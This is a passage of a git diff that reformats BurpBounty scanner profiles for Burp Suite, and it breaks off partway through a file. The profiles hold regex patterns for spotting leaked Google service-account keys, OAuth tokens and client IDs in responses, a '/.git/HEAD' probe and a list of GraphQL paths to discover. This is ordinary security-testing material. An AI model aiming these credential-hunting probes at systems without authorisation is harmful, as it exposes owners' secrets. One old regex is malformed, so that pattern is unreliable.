-[{"Name":"GCP_Service_Account","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,\\\"type\\\": \\\"service_account\\\""],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"GCP Service Account","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "GCP_Service_Account",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,\\\"type\\\": \\\"service_account\\\""
+ ],
+ "Tags": [
+ "Cloud",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "GCP Service Account",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/GCP_Urls.bb b/profiles/GCP_Urls.bb
old mode 100644
new mode 100755
index 134a2d7..587328d
--- a/profiles/GCP_Urls.bb
+++ b/profiles/GCP_Urls.bb
@@ -1 +1,61 @@
-[{"Name":"GCP_Urls","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,.corp.google.com","true,Or,.c.googlers.com"],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"GCP Urls found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "GCP_Urls",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,.corp.google.com",
+ "true,Or,.c.googlers.com"
+ ],
+ "Tags": [
+ "Cloud",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "GCP Urls found",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/GitFinder.bb b/profiles/GitFinder.bb
index f325c57..94cec17 100755
--- a/profiles/GitFinder.bb
+++ b/profiles/GitFinder.bb
@@ -1 +1,63 @@
-[{"Name":"GitFinder","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/.git/HEAD"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,refs"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"GitFinder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "GitFinder",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/.git/HEAD"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,refs"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 5,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "GitFinder",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Gmail_Oauth_2.0.bb b/profiles/Gmail_Oauth_2.0.bb
old mode 100644
new mode 100755
index fecbcdb..e2e23ea
--- a/profiles/Gmail_Oauth_2.0.bb
+++ b/profiles/Gmail_Oauth_2.0.bb
@@ -1 +1,59 @@
-[{"Name":"Gmail_Oauth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Gmail Oauth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Gmail_Oauth_2.0",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Gmail Oauth 2.0",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Google_Cloud_Buckets.bb b/profiles/Google_Cloud_Buckets.bb
old mode 100644
new mode 100755
index fd29c35..914dc7c
--- a/profiles/Google_Cloud_Buckets.bb
+++ b/profiles/Google_Cloud_Buckets.bb
@@ -1 +1,59 @@
-[{"Name":"Google_Cloud_Buckets","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(\\.storage\\.googleapis\\.com)|(\\.storage\\.cloud\\.googleapis\\.com)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Cloud Buckets","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Google_Cloud_Buckets",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(\\.storage\\.googleapis\\.com)|(\\.storage\\.cloud\\.googleapis\\.com)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Google Cloud Buckets",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Google_Cloud_Platform_OAuth_2.0.bb b/profiles/Google_Cloud_Platform_OAuth_2.0.bb
old mode 100644
new mode 100755
index a30a5f2..02722d2
--- a/profiles/Google_Cloud_Platform_OAuth_2.0.bb
+++ b/profiles/Google_Cloud_Platform_OAuth_2.0.bb
@@ -1 +1,60 @@
-[{"Name":"Google_Cloud_Platform_OAuth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Cloud Platform OAuth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Google_Cloud_Platform_OAuth_2.0",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
+ "true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Google Cloud Platform OAuth 2.0",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Google_Drive_OAuth.bb b/profiles/Google_Drive_OAuth.bb
old mode 100644
new mode 100755
index 5077b25..fd390a7
--- a/profiles/Google_Drive_OAuth.bb
+++ b/profiles/Google_Drive_OAuth.bb
@@ -1 +1,59 @@
-[{"Name":"Google_Drive_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Drive OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Google_Drive_OAuth",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Google Drive OAuth",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Google_Oauth.bb b/profiles/Google_Oauth.bb
old mode 100644
new mode 100755
index 05f9bf3..314dce4
--- a/profiles/Google_Oauth.bb
+++ b/profiles/Google_Oauth.bb
@@ -1 +1,60 @@
-[{"Name":"Google_Oauth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(ya29\\.[0-9A-Za-z\\-_]+)","true,Or,[^a-zA-Z0-9](ya29\\.[0-9A-Za-z\\-_]+)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Oauth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Google_Oauth",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^(ya29\\.[0-9A-Za-z\\-_]+)",
+ "true,Or,[^a-zA-Z0-9](ya29\\.[0-9A-Za-z\\-_]+)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Google Oauth",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/GraphqlPath.bb b/profiles/GraphqlPath.bb
index 5467d30..e268d31 100755
--- a/profiles/GraphqlPath.bb
+++ b/profiles/GraphqlPath.bb
@@ -1 +1,83 @@
-[{"Name":"GraphqlPath","Enabled":true,"Scanner":3,"Author":"@Sy3Omda","UrlEncode":false,"Grep":["true,Or,All Request,Name,/graphql","true,Or,All Request,Name,/graphql/console","true,Or,All Request,Name,/graphql.php","true,Or,All Request,Name,/graphiql","true,Or,All Request,Name,/graphiql.php","true,Or,All Request,Name,/explorer","true,Or,All Request,Name,/altair","true,Or,All Request,Name,/playground","true,Or,All Request,Name,/v1/graphql","true,Or,All Request,Name,/v1/graphql/console","true,Or,All Request,Name,/v1/graphql.php","true,Or,All Request,Name,/v1/graphiql","true,Or,All Request,Name,/v1/graphiql.php","true,Or,All Request,Name,/v1/explorer","true,Or,All Request,Name,/v1/alt4ir","true,Or,All Request,Name,/v1/playground","true,Or,All Request,Name,/v2/graphql","true,Or,All Request,Name,/v2/graphql/console","true,Or,All Request,Name,/v2/graphql.php","true,Or,All Request,Name,/v2/graphiql","true,Or,All Request,Name,/v2/graphiql.php","true,Or,All Request,Name,/v2/explorer","true,Or,All Request,Name,/v2/altair","true,Or,All Request,Name,/v2/playground"],"Tags":["Graphql","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Graphql Path Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Graphql Path Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "GraphqlPath",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@Sy3Omda",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Name,/graphql",
+ "true,Or,All Request,Name,/graphql/console",
+ "true,Or,All Request,Name,/graphql.php",
+ "true,Or,All Request,Name,/graphiql",
+ "true,Or,All Request,Name,/graphiql.php",
+ "true,Or,All Request,Name,/explorer",
+ "true,Or,All Request,Name,/altair",
+ "true,Or,All Request,Name,/playground",
+ "true,Or,All Request,Name,/v1/graphql",
+ "true,Or,All Request,Name,/v1/graphql/console",
+ "true,Or,All Request,Name,/v1/graphql.php",
+ "true,Or,All Request,Name,/v1/graphiql",
+ "true,Or,All Request,Name,/v1/graphiql.php",
+ "true,Or,All Request,Name,/v1/explorer",
+ "true,Or,All Request,Name,/v1/alt4ir",
+ "true,Or,All Request,Name,/v1/playground",
+ "true,Or,All Request,Name,/v2/graphql",
+ "true,Or,All Request,Name,/v2/graphql/console",
+ "true,Or,All Request,Name,/v2/graphql.php",
+ "true,Or,All Request,Name,/v2/graphiql",
+ "true,Or,All Request,Name,/v2/graphiql.php",
+ "true,Or,All Request,Name,/v2/explorer",
+ "true,Or,All Request,Name,/v2/altair",
+ "true,Or,All Request,Name,/v2/playground"
+ ],
+ "Tags": [
+ "Graphql",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Graphql Path Found",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Graphql Path Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Heroku_OAuth_2.0.bb b/profiles/Heroku_OAuth_2.0.bb
old mode 100644
new mode 100755
index 3cd4e19..10cdc27
--- a/profiles/Heroku_OAuth_2.0.bb
+++ b/profiles/Heroku_OAuth_2.0.bb
@@ -1 +1,60 @@
-[{"Name":"Heroku_OAuth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9](0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Heroku OAuth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Heroku_OAuth_2.0",
+ "Name": "",
